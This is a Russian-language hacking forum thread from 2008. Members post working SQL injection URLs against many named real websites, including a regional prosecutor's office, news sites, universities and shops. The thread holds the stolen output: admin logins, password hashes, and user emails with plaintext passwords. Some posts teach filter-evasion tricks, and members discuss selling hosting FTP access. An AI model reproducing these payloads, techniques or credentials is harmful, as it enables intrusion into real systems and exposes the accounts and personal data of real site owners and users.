_http://www.artstatements.com/artist_dtl.php?id=-33+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42--
5.0.67-msl-icd1-log
-----------
_http://www.michaelpollan.com/article.php?id=-33+union+select+1,2,3,4,5,6,version(),8,9,10--
4.1.22-standard
-m0rgan-
26.12.2008, 22:46
_http://www.pcibooks.com/book_info.php?id=-33+union+select+1,2,version(),4,5,6,7,8,9,10,11,12--
4.1.22-log
http://www.pcibooks.com/book_info.php?id=-33+union+select+1,2,concat_ws(0x3a,user,password), 4,5,6,7,8,9,10,11,12%20+from+mysql.user--
_http://www.artstatements.com/artist_dtl.php?id=-33+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42--
5.0.67-msl-icd1-log
http://www.artstatements.com/artist_dtl.php?id=-33+union+select+1,2,3,4,5,6,7,8,concat(table_schem a,0x3a,table_name,0x3a,column_name),10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42+from+informatio n_schema.columns+limit+1,1--
Перебираем таблици с колонками...
Остальные стало лень...(((
SQL-INJ:
http://www.devochki.com/members/profile.php?pid=-327
http://www.devochki.com/members/profile.php?pid=-327+union+select+1,concat(version(),0x3a,user(),0x 3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,37,38,39--
Version - 5.0.67-community-log
User - devochki_dating@localhost
Database - devochki_dating
http://www.devochki.com//members/profile.php?pid=-327+union+select+1,concat(fusername,0x3a,fpassword ),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37, 38,39+from+atadmin--
Админка
http://www.devochki.com/admin/
krasi0:123
не прет сегодня на скули..
http://www.heimlichinstitute.org/page.php?id=-4+union+select+1,2,3,4/*
пр: 5
spherics
27.12.2008, 15:51
Это верно..
http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3,4,5,6,7,8,9--
http://www.yesoudo.com/channel_detail.php?chid=-15+union+select+1,concat_ws(0x3a3a,user,password), 3,4,5,6,7,8,9+from+mysql.user--
root::*29D1EAE62F6F4F8D245F4F03DC8D4B6FD99516C4
version:5.0.21-log
user:root@localhost
database:yesoudo
Татуировочки..
http://tatty.ru/galary/index.php?id=-41+union+select+1,concat_ws(0x3a3a,version(),user( ),database()),3,4,5,6,7,8,9,10,11,12,13/*
version:4.1.22
user:tropico_mysql@10.1.10.215
database:tropico_db
Чтото я не вьеду а где пароли:
http://www.artmos.ru/art.php?st=-4+union+select+1,table_name,3+from+information_sch ema.tables--
mailbrush
27.12.2008, 20:21
Чтото я не вьеду а где пароли:
http://www.artmos.ru/art.php?st=-4+union+select+1,table_name,3+from+information_sch ema.tables--
Это ты вывел все таблицы, которые есть в базе сайта, но не пароли!
Thrasher88
27.12.2008, 20:43
Поиском ничего из этого не нашел, так что извиняете, если уже было..
trud.ru - интернет-издание :p
http://www.trud.ru/issue/news.php?id=-1+union+select+1,2,concat_ws(0x3a3a,version(),user (),database()),4,5,6,7,8--
Version - 4.1.21-log
User - trudinfo@localhost
Database - trudinfo_db
Google PR: 8
Yandex тИЦ: 6900
Alexa.com: 3429
apa.az - азербайджанский новостной сайт
http://ru.apa.az/news.php?id=-1+union+select+1,2,concat_ws(0x3a3a,version(),user (),database()),4,5,6,7,8,9,10,11,12,13,14,15,16--
Version 5.0.67-community
User apaadm_user@localhost
Database apaadm_ru
Google PR: 6
www.remsoft.com - "программное обеспечение для промышленности"
http://www.remsoft.com/news.php?id=-1+union+select+1,2,3,concat_ws(0x3a3a,version(),us er(),database()),5--
Version 4.1.22-community-nt-log
User remsoft@WSH-004
Database remsoft
Google PR: 5
www.chuvprok.gov.ru - сайт Прокуратуры Чувашской области :)
http://www.chuvprok.gov.ru/news.php?id=-1+union+select+1,concat_ws(0x3a3a,version(),user() ,database()),3,4,5--
Version 4.0.17-nt
User prokuratura@localhost
Database prokuratura
Это ты вывел все таблицы, которые есть в базе сайта, но не пароли!
Да я знаю что таблици и колонки выводил но в какой таблици могут быть пороли ума не прилажу
masternet
27.12.2008, 21:15
Это ты вывел все таблицы, которые есть в базе сайта, но не пароли!
нет,не все..а только первую..а всё выводятся так:
http://www.artmos.ru/art.php?st=-4+union+select+1,unhex(hex(group_concat(table_name ))),3+from+information_schema.tables--
пассов тут и не должно быть по мойму..сайт ваще чо-то стрёмный..
File_priv - N
админки думаю нет..табл никаких норм нет..
p.s. учите русский язык и пишите норм.
-m0rgan-
27.12.2008, 21:20
Чтото я не вьеду а где пароли:
http://www.artmos.ru/art.php?st=-4+union+select+1,table_name,3+from+information_sch ema.tables--
Здесь 3 бд:
information_schema
avtosite_art
test
Выведим из всех бд название таблиц и колонок:
http://www.artmos.ru/art.php?st=-4+union+select+1,concat(table_schema,0x3a,table_na me,0x3a,column_name),3+from+information_schema.col umns--
Ну а далюше уже сам их перебирай, мож чет и найдешь... ;)
-m0rgan-
27.12.2008, 21:50
не прет сегодня на скули..
http://www.heimlichinstitute.org/page.php?id=-4+union+select+1,2,3,4/*
пр: 5
http://www.heimlichinstitute.org/page.php?id=-4+union+select+1,convert(concat(table_schema,0x3a, table_name,0x3a,column_name) using latin1),3,4+from+information_schema.columns+limit+ 1,1--
Там менще 30таблиц и больше 100 колонок...
mailbrush
27.12.2008, 22:06
http://www.artmos.ru/
Ы) У мну фтпшник есть к хостингу этого сайта =).
http://www.artmos.ru/xfile.htm
mailbrush
27.12.2008, 22:23
http://www.artmos.ru/art.php?st=-4+union+select+1,table_name,3+from+information_sch ema.tables--
Таблиц: 44
st_adruweb
st_allavtotuning
st_artmos
st_avtositeinfo
st_avtositeru
st_bugattiinfo
st_chryslerinfo
st_doktoru
st_elpages
st_emasters
st_euroavtomobiles
st_evronedvizhimost
st_evrooknapvh
st_ferrariinfo
st_fordinfo
st_greatsettop
st_kamaz
st_kriminal
st_lamborghiniinfo
st_marketru
st_med
st_mlogo
st_mmf
st_mobiart
st_mobilasoft
st_mobileafisha
st_mobilextreme
st_mytehavto
st_onliner
st_polyfoniya
st_prestizhnedv
st_pro
st_realwebsite
st_renoclub
st_rostdohodov
st_rosttic
st_scanditour
st_style
st_tehokna
st_teklait
st_tel
st_valeh
st_virsklad
st_you
Ы) У мну фтпшник есть к хостингу этого сайта =).
http://www.artmos.ru/xfile.htm
Будь другом дай, пжл.
Мне сайт не интересен, я тока учусь
mailbrush
27.12.2008, 22:59
Будь другом дай, пжл.
Мне сайт не интересен, я тока учусь
Осознаешь, что говоришь? Цена его >100$, а те нашару =))) Это не фтп к сайту, а к хостеру, в которого есть больше чем 100доменов....
Осознаешь, что говоришь? Цена его >100$, а те нашару =))) Это не фтп к сайту, а к хостеру, в которого есть больше чем 100доменов....
Почему на шару у меня есть вкусняшка на обмен
ася:452313199
Thrasher88
27.12.2008, 23:34
Ловите скули в тему:
http://www.host.kr.ua/stat/index.php?id='+union+select+1,version(),3,4,5,6,7, 8,9--%20%201
Оба - сайты хостинг-провайдеров! :))
spherics
28.12.2008, 00:07
Поиграем в пейнтболл!
ТИЦ = 1100
PageRank = 6
http://www.paintball.ru/next.php?id=999930+union+select+1,2,concat_ws(0x3a 3a,version(),user(),database())--
Database Version: 5.0.67-community-log
Database name: paintball_dbn
User name: paintball_dbn@localhost
http://www.paintball.ru/next.php?id=999930+union+select+1,2,concat_ws(0x3a 3a,id,login,pass,usermail)+from+pb_users+limit+10, 10--
Getting Data from table pb_users from database paintball_dbn
id:usertype:usermail:login:pass
[1]:2:1:consult@paintball.ru:club2:kr3Bx
[2]:4:0:info@squall.ru:team1:1qn0i
[3]:6:1:ooo_iss@vologda.ru:club5:299TV
[4]:8:1:paintball@vologda.ru:club7:AGKrv
[5]:25:1:berkut@rambler.ru:club23:73mZe
[6]:10:1:burunduki@mail.ru:club9:1on38
[7]:11:1:aso@i1.ru:club10:l0F72
[8]:59:1:cyber-orc@yandex.ru:club43:M4M56
[9]:58:1:nikishov72@mail.ru:club42:vk17I
их много...
http://www.npadd.ru/index.php?a=pub&id=99999'+union+select+1,version(),3,4,5,6,7,8,9,1 0,11,12/*
version: 5.0.27
user: npadd@localhost
database: npadd
http://www.fak.org.za/site/artikels_argief.php?id=99999+union+select+1,versio n(),user(),database(),5,6,7,8,9/*
version: 5.0.32-Debian_7etch8
user: fakadmin_1@localhost
database: fakadmin_db1
Таблицы:
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
artikels
pages
users
http://www.improvision.com/application_center/references/detail.php?id=99999+union+select+1,2,version(),4,5 ,6,7/*
version: 5.0.45-community-nt
user: internet@PRECOMWEB2.PERKINELMER.NET
database: improvision
Таблицы:
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
ff_badindex
ff_badindex_sequence
ff_clickthrus
ff_clickthrus_sequence
ff_hierarchy
ff_hierarchy_sequence
ff_index
ff_index_sequence
ff_last
ff_last_sequence
ff_searches
ff_searches_sequence
ff_users
ff_users_sequence
application_centre
downloads
employment
events
impro_news
journal_references
lab_of_the_month
order_enquiries_contacts
registrations
tech_notes
vipoir_tips
columns_priv
db
func
help_category
help_keyword
help_relation
help_topic
host
proc
procs_priv
tables_priv
time_zone
time_zone_leap_second
time_zone_name
time_zone_transition
time_zone_transition_type
user
autoresponders
banned_emails
customfield_lists
customfields
form_customfields
form_lists
form_pages
forms
jobs
jobs_lists
links
list_subscriber_bounces
list_subscribers
list_subscribers_unsubscribe
lists
newsletters
old_links
queues
queues_sequence
settings
stats_autoresponders
stats_emailforwards
stats_emailopens
stats_linkclicks
stats_links
stats_newsletter_lists
stats_newsletters
stats_sequence
stats_users
subscribers_data
templates
user_access
user_permissions
user_stats_emailsperhour
users
phpqadmin
phpqanswer
phpqanswerchoice
phpqquestion
phpqsession
phpqsurvey
phpquser
phpbb3_acl_groups
phpbb3_acl_options
phpbb3_acl_roles
phpbb3_acl_roles_data
phpbb3_acl_users
phpbb3_attachments
phpbb3_banlist
phpbb3_bbcodes
phpbb3_bookmarks
phpbb3_bots
phpbb3_config
phpbb3_confirm
phpbb3_disallow
phpbb3_drafts
phpbb3_extension_groups
phpbb3_extensions
phpbb3_forums
phpbb3_forums_access
phpbb3_forums_track
phpbb3_forums_watch
phpbb3_groups
phpbb3_icons
phpbb3_lang
phpbb3_log
phpbb3_moderator_cache
phpbb3_modules
phpbb3_poll_options
phpbb3_poll_votes
phpbb3_posts
phpbb3_privmsgs
phpbb3_privmsgs_folder
phpbb3_privmsgs_rules
phpbb3_privmsgs_to
phpbb3_profile_fields
phpbb3_profile_fields_data
phpbb3_profile_fields_lang
phpbb3_profile_lang
phpbb3_ranks
phpbb3_reports
phpbb3_reports_reasons
phpbb3_search_results
phpbb3_search_wordlist
phpbb3_search_wordmatch
phpbb3_sessions
phpbb3_sessions_keys
phpbb3_sitelist
phpbb3_smilies
phpbb3_styles
phpbb3_styles_imageset
phpbb3_styles_imageset_data
phpbb3_styles_template
phpbb3_styles_template_data
phpbb3_styles_theme
phpbb3_topics
phpbb3_topics_posted
phpbb3_topics_track
phpbb3_topics_watch
phpbb3_user_group
phpbb3_users
phpbb3_warnings
phpbb3_words
phpbb3_zebra
phpbb_auth_access
phpbb_banlist
phpbb_categories
phpbb_config
phpbb_confirm
phpbb_disallow
phpbb_forum_prune
phpbb_forums
phpbb_groups
phpbb_posts
phpbb_posts_text
phpbb_privmsgs
phpbb_privmsgs_text
phpbb_ranks
phpbb_search_results
phpbb_search_wordlist
phpbb_search_wordmatch
phpbb_sessions
phpbb_smilies
phpbb_themes
phpbb_themes_name
phpbb_topics
phpbb_topics_watch
phpbb_user_group
phpbb_users
phpbb_vote_desc
phpbb_vote_results
phpbb_vote_voters
phpbb_words
http://independentshop.de/content.php?content_type=99999+union+select+1,vers ion(),user()/*
version: 4.0.27-standard
user: dbo162775637@localhost
database: db162775637
I love this game
28.12.2008, 01:50
_http://www.heimlichinstitute.org/page.php?id=-4+union+select+1,2,3,4--
4.1.22-log
_http://www.mcaleesemarine.com/boat-spec.php?id=-0306076+union+select+1,2,3,4,5,6,7,8,version(),10, 11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,4 4,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60--
4.1.22-standard
_http://www.widescreenreview.com/blog_detail.php?id=-23+union+select+1,version(),3,4,5,6,7,8,9,10,11,12 ,13,14,15,16--
4.1.22-standard
masternet
28.12.2008, 02:12
http://encycl.anthropology.ru/article.php?id=-1+union+select+1,unhex(hex(group_concat(table_name ))),3,4,5,6,7,8,9,10+from+information_schema.table s--
http://encycl.anthropology.ru/article.php?id=-1+union+select+1,unhex(hex(group_concat(column_nam e))),3,4,5,6,7,8,9,10+from+information_schema.colu mns+where+table_name=0x75736572--
http://encycl.anthropology.ru/article.php?id=-1+union+select+1,concat_ws(char(32,45,32),usr_logi n,usr_pass),3,4,5,6,7,8,9,10+from+user--
-=Razor=-
28.12.2008, 02:22
http://www.etver.ru/catalog/index.php?type=category&first=1&offset=140&id=-9999999999+union+select+concat(version(),user(),da tabase())/*
4.1.22etver@localhostetver
ТИЦ:1500
PR:5
http://www.xennews.com/index.php?id=3&group=-1+union+select+1,concat(version(),database(),user( )),3,4,5,6,7/*
4.1.22xennewsx3nn3ws@localhost
http://www.mauioceancenter.com/index.php?id=-1+union+select+concat(version(),database(),user()) ,2,3/*
4.1.22-standardmoc_dbmoc_usermoc@localhost
ТИЦ:20
PR: 5
masternet
28.12.2008, 02:28
http://www.kitana.ru/razdel.php?id=-1+union+select+1,2,3,unhex(hex(group_concat(table_ name)))+from+information_schema.tables--
http://www.kitana.ru/razdel.php?id=-1+union+select+1,2,3,unhex(hex(group_concat(column _name)))+from+information_schema.columns+where+tab le_name=0x706572736f6e616c--
http://www.kitana.ru/razdel.php?id=-1+union+select+1,2,3,concat_ws(char(32,45,32),id,l ogin,psw,type,fio,phone,email)+from+personal
ТИЦ : 220 PR: 4
не смеши мои носки..пробелы удали и всё..а то они автоматом ставятся..
----------
http://nodel.org/events.php?ID=-1+union+select+1,unhex(hex(group_concat(table_name ))),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+inform ation_schema.tables--
пр -5 тиц -10
masternet, там походу пофиксили ужо...
spherics
28.12.2008, 04:41
С игрушкой известной связано Legends of Norrath !
Впечатлило количество....)
http://lonloot.ru/index.php?l=-4+union+select+1,2,concat_ws(0x3a3a,version(),user (),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50, 51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67 ,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,8 4,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100 ,101,102,103,104,105,106,107,108,109,110,111,112,1 13,114,115,116,117,118,119,120,121,122,123,124,125 ,126,127,128,129,130,131,132,133,134,135,136,137,1 38,139,140,141,142,143,144,145,146,147,148,149,150 ,151,152,153,154,155,156,157,158,159,160,161,162,1 63,164,165--
Database Version: 5.0.51a-community-log
Database name: a12kbru_lon
User name: a12kbru_lon@localhost
Getting Data from table users from database a12kbru_lon
Fields id:user_name:user_pass:e_mail:group_id:fio:in_orde rs:last_orders
[1]:24:nikonoff:cc1be2756ee268969328208597b5bd90:niko noff@inbox.ru:1:Константин Никонов:1:1
Berkeley.edu - PR 9
http://eps.berkeley.edu/development/view_person.php?uid=-7517+union+select+1,2,3,email,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24,25,26+from+user/*
пр6 поддомена ) но жаль ничего у меня не вышло) смотрим...
-=Razor=-
http://www.etver.ru/catalog/index.php?type=category&first=1&offset=140&id=-1+union+select+concat_ws(0x3a,name,pwd)+from+chat_ users/*
http://www.etver.ru/meet/validate.php?validate=0&action=edit
не канает (
http://fc.medifirstsys.com/profile.php?pid=-1+union+select+1,2,concat_ws(0x3a,username,passwor d),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,3 8,39,40,41,42+from+users+limit+1,1/*
emedihub@localhost:5.0.45
amy:866c7ee013c58f01fa153a8d32c9ed57 -> 7788
Iceangel_
28.12.2008, 10:33
http://www.kitana.ru/razdel.php?id=-1+union+select+1,2,3,concat_ws(char(32,45,32),id,l ogin,psw,type,fio,phone,email)+from+personal
ТИЦ : 220 PR: 4
а что админку не выложил? ;)
1.5 года назад на ней скуль нашел, пассы к админке несколько месяцев назад подходили...
-=megahertz=-
28.12.2008, 11:46
http://inf.by/metal/?grid=-61+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24/*
Version: 5.0.41
Db name: blogdb
User: blogadmin@localhost
masternet
28.12.2008, 14:10
http://www.eutrainingsite.com/open_details.php?id=-1+union+select+1,unhex(hex(group_concat(table_name ))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2, 21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 ,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,5 4,55+from+information_schema.tables--
http://www.eutrainingsite.com/open_details.php?id=-1+union+select+1,unhex(hex(group_concat(column_nam e))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53, 54,55+from+information_schema.columns+where+table_ name=0x61646d696e--
http://www.eutrainingsite.com/open_details.php?id=-1+union+select+1,concat_ws(char(32,45,32),felh_nev ,jelszo,jog_szint),3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,2,21,22,23,24,25,26,27,28,29,30,31,32 ,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,4 9,50,51,52,53,54,55+from+admin--
тиц 10 пр- 7
доступ в админку запрещён...
MSSQL
http://www.sunion.warwick.ac.uk/archery/records/byarcher_viewscore.php?id=81%20or%201=@@version--
Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
Gemini12
28.12.2008, 16:44
http://presscenter.kz/index.php?show=news&id=1+union+select+1,2,3,4,5--
нихера не понял...
http://www.exhibitionculture.arts.gla.ac.uk/gallery.php?gid=309
User exhibitions_user@localhost
Version: 5.0.22-Debian_0ubuntu6.06.11-log
Dbname: exhibitions
http://presscenter.kz/index.php?show=news&id=1+union+select+1,2,3,4,5--
нихера не понял...
http://presscenter.kz/index.php?show=news&id=-1+UNION+SELECT+CONCAT(0x3a,Version(),0x3a),2,3,4,5 ,6,7,8,9/*
Version() - 5.0.19
Database() - presscenter
http://presscenter.kz/index.php?show=news&id=-1+UNION+SELECT+table_name,2,3,4,5,6,7,8,9+from+inf ormation_schema.tables+limit+17,1/*
как ты определил что в начале до 9-ти нао перебирать там ведь хоть до 999 перебери надпись не меняетя!
masternet
28.12.2008, 19:51
как ты определил что в начале до 9-ти нао перебирать там ведь хоть до 999 перебери надпись не меняетя!
а ты уверен?ты встречался со скулями где например вместо ошибки надпись "Хакинг атемптинг" или тому подобного..
так же и здесь..это не стандартная скуля..
а цифра один экранируется в ошибке..
----
Germani если есть разница вывода то скуля(т.е. если на 1 есть надпись,а на 999 нет,или наоборот)
Gemini12
28.12.2008, 19:59
Да кстати! Я встречался с такими, на ntu.kz, в случае хоть малейшей пробы на скулю, пишет что-то вроди: "Hacker's attack attempt, admin was informed"
"Компания АМТЭЛ. С первых дней основным видом деятельности компании являются сетевые проекты, поставка серверов и систем высшего класса отказоустойчивости..."
http://www.amtel.ru/page.php?id=-1+union+select+version()/*
как ты определил что в начале до 9-ти нао перебирать там ведь хоть до 999 перебери надпись не меняетя!
http://presscenter.kz/index.php?show=news&id=-1+order+by+10/*
http://presscenter.kz/index.php?show=news&id=-1+order+by+9/*
Gemini12
28.12.2008, 21:40
http://www.izba.kz/ru/pages/index.php?id=-1+union+select+1,2,3,4,5,6,version(),8,user(),10,1 1,12,13,14,15,16,17,18,19,20--
4.1.22-STANDARD
siteis_user@localhost
Gemini12
28.12.2008, 22:39
http://www.suncar.kz/index.php?id=1+union+select+unhex(hex(concat(table _name))),database(),version(),user()+from+informat ion_schema.tables--
http://www.readplus.com.au/blog_detail.php?id=239+union+select+1,version(),3, 4,5,6,7,8,9/*
4.1.22-standard
http://www.egd.com/pages/blog_detail.php?id=-11+union+select+1,2/*
http://www.publicaffairsnetworking.com/blog_detail.php?id=-29+union+select+1,version(),3,4,5,6/*
5.0.45
http://hddvdmovieguide.com/blog_detail.php?id=-64+union+select+1,2,3,4,5,version(),7,8,9,10,11,12 ,13,14,15,16/*
4.1.22-standard
http://www.dvdmovieguide.com/blog_detail.php?id=-10+union+select+1,2,3,4,5,version(),7,8,9,10,11,12 ,13,14,15,16/*
4.1.22-standard
http://www.visitmaldives.com/ru/Where_to_stay/cruise-boat.php?id=-31+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18/*
4.1.22-standard
http://nauticaseychelles.com/boat.php?id=-37+union+select+1,version(),3,4,5,6/*
4.1.22-standard-log
http://www.pelicanmarine.com.au/boat.php?ID=-1018+union+select+1,version(),3,4,5,6,7,8,9,10/*
4.1.22-standard 3
http://www.gosail.com/boat.php?display=-29+union+select+version(),2,3,4,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46--
5.0.67-community
http://www.mclayboats.co.nz/boat.php?id=15+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12/*
4.0.27-standard-log
не очень люблю выкладывать линки.. не удержался.
Сайт посвящен php программированию. Типа php.net :)
http://www.phpbuddy.com/article.php?id=-1+union+select+1,2,3,4,5,6/*
phpbud22_phpbudd@localhost_4.1.21-standard
Innatack.Ru
Только в опере почему то отображается .... хз почему..
http://www.inattack.ru/program/662.html'
В самом низу страницы, и в соурсе внизу -
<!--select url, name from linkobmen where url_list LIKE ('%/program/662.html'%') and datedo >1230500502 /// You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') and datedo >1230500502' at line 1--><center><font color=red size=4>Ошибка БД (2)</
Пробовал раскручивать - не идет что то.. может фейк?
Gemini12
29.12.2008, 11:44
http://www.emctc.ru/cgi-bin/db_new_logist.cgi?num=-1+union+select+1,column_name,3+from+information_sc hema.columns+where+table_name='item'--
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
ALPHABET
ALPHABET_ENG
ANONS
BELARUS
BELARUS_V
CARRIERS
CARRIERS_ENG
CONTENT
CONTENT_ENG
CRYPTO
CUSTOMS
CUSTOMS1
CUST_BOD
CUST_BOD_ENG
CUST_BOD_MOS
CW
DEPARTMENTS
DEPARTMENTS_ENG
DOCS
DOCS1
DOCS2
DOCS_EMCTC
DOCS_ENG
DOCS_T
DUTYFREE
ECONOMY
ECONOMY_ENG
EMCTC_CONTENT
EMCTC_NEWS
EMCTC_NEWS_SECTIONS
EVROAZS
EVROAZS_ENG
HIT
INFRINGERS1
INFRINGERS2
KAZAHSTAN
KAZAHSTAN_V
KLIENTI
LINKS
LOGISTIC
LOGISTICRSS
LOGISTIC_ENG
NEWS
NEWSRSS
NEWS_ENG
OTO
POPULYR
PRACTICE
QUESTIONS_VCH
REFERATS
REVIEW
REVIEW_ENG
RUMORS
RUMORS_ENG
SEMINARS
SHIFR
SHIT
SearchStrings
TEMP
TEXT
TEXT_ENG
TW
UKRAINA
UKRAINA_V
VASYANYA
VTOROSSII
WAREHOUSES
aaa
banners
banners_eng
baz_sklad
doska_bodies
doska_headers
garant_banks
item
item_group
job_bodies
job_headers
price30
tam
мне кажется или все папки пустые? :confused:
http://www.claptonweb.com/boots/boot.php?id=-124+union+select+1,2,3,4,5,6,7,8,9,10,11,12,versio n(),14,15,16,17/*
5.0.45-Debian_1ubuntu3.3-log
http://www.cfsontario.ca/english/general.php?id=11111111111111111+union+select+1,2, 3,version(),5,6,7,8,9,10,11/*
5.0.45-log
http://www.akg-russia.ru/about.php?id=-4+union+select+1,2,3,4,5/*
http://www.akg-russia.ru/about.php?id=-4+union+select+1,2,3,4,5/*
http://www.greetingcard.org/about.php?ID=-2+union+select+1,version(),3,4,5,6,7,8,9,10--
5.0.67
http://www.tptherapy.com/about.php?id=-19'+union+select+1,2,3,version(),5,6,7,8,9/*
4.1.22-standard
http://www.mlsoftball.com/about.php?ID=-2+union+select+1,2,version()/*
4.0.27-standard
http://www.palit.biz/main/about.php?id=-1+union+select+1,2,3,4,version(),6,7/*
4.1.21
http://www.demotech.org/d-about.php?id=-3+union+select+1,version(),3,4,5,6/*
5.0.32-Debian_7etch1
http://www.artmaterial.ru/about.php?content=dealer&id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12/*
4.1.22-standard-log
http://www.ywamyork.com/about/about.php?id=-11+union+select+1,version(),3,4,5,6,7,8,9--
5.0.67-community-log
http://www.personal.in.ua/article.php?ida=-346+union+select+1,2,3,version(),5,6,7,8,9,10,11,1 2,13/*
4.1.22
http://www.brain-storming.info/article.php?ida=-70+union+select+1/*
Gemini12
29.12.2008, 15:50
http://www.projector-club.ru/index.php?id=9&manuf=-1+union+select+user(),2,3,version(),5,6,7,8,9,10,1 1,12,database(),14,15,16,17,18,19,20--
olimpor_project@localhost
olimpor_projector
4.1.22-standard-log
I love this game
29.12.2008, 16:00
_http://en.apa.az/news.php?id=-89125+union+select+1,2,version(),4,5,6,7,8,9,10,11 ,12,13,14,15,16--
5.0.67-community
_http://www.aupe.org/in_the_news/news.php?id=-993+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21--
4.0.18
_http://www.avezdoaluno.com.br/navegacao/prof.php?id=-53+union+select+1,2,3,4,version(),6,7,8,9,10,11,12 ,13,14,15--
5.0.67-log
Gemini12
29.12.2008, 19:49
http://www.mibf.ru/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
Я ослеп!!!
Tkastrey.ru - PR5 ~4к
http://www.tkastrey.ru/article.php?aid=588+union+select+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14/*
логический вывод 4 ветка..
Arkhangel.ru - PR3 ~5к
http://www.arkhangel.ru/?a=-43+union+select+1,2,concat_ws(0x3a,table_name),4,5 ,6,7+from+information_schema.columns+where+column_ name+like+0x6c6f67696e/*
5 ветка, в базе нету табл форума(
Pashkela
29.12.2008, 23:19
гы-гы, http://arkhangel.ru/phpBB2/
понятно, что нет
Pashkela
29.12.2008, 23:32
http://independentshop.de/content.php?content_type=99999+union+select+1,vers ion(),user()/*
version: 4.0.27-standard
user: dbo162775637@localhost
database: db162775637
Тоже буду подарки на НГ делать:))
Найденные таблицы:
-------
article
content
customer
news
orders
partner
session
shops
-------
=============================
Найденные колонки из таблицы customer:
-------
email
password
status
username
=============================
Поясните, что за дрянь, уже порядка трех десятков с такой дрянью нашел:
http://www.ac-alp.ru/part/index.php?id=-42+order+by+10--
А он мне пишет:
Bad Request
Your browser sent a request that this server could not understand.
The request line contained invalid characters following the protocol string.
Jokester
30.12.2008, 00:14
vladvk Это фильтрация "+", " ", не знаю , может ещё чего не смотрел )
http://www.ac-alp.ru/part/index.php?id=-41/**/union/**/select/**/1,2,concat_ws(0x3a,User(),Database(),Version()),4, 5,6,7
PS Вопросы в соседней теме (на будующее)
PPS
Нету прав...
Я же Вас просил. не писать охинею :)
-m0rgan-
30.12.2008, 00:44
jokester, сорри)
Исправляемся:
Сйт представляет услугу мониторинга seo-параметров, таких как
Индекс цетирования Yandex тИЦ
Индекс Google PageRank
Количество проиндексированных страниц в Yandex
http://www.seo-mon.com/news.php?id=-1+union+select+1,2,concat_ws(0x3a,user_id,nikname, lastname,firstname,secondname,email,login,password ,register_time,status,type,register_id),4,5,6+from +users--
Логин/пасс:
tigranav:8791109100
--------------------------------------------------
The End!
purple.fr магазинчик
http://www.purple.fr/fashion.php?c=-7+union+select+1,concat_ws(0x2f,version(),database (),user())/*
5.0.32-Debian_7etch8-log/purple/purple@localhost
http://www.purple.fr/fashion.php?c=-7+union+select+1,group_concat(concat_ws(0x2f,login ,passwd))+from+user/*
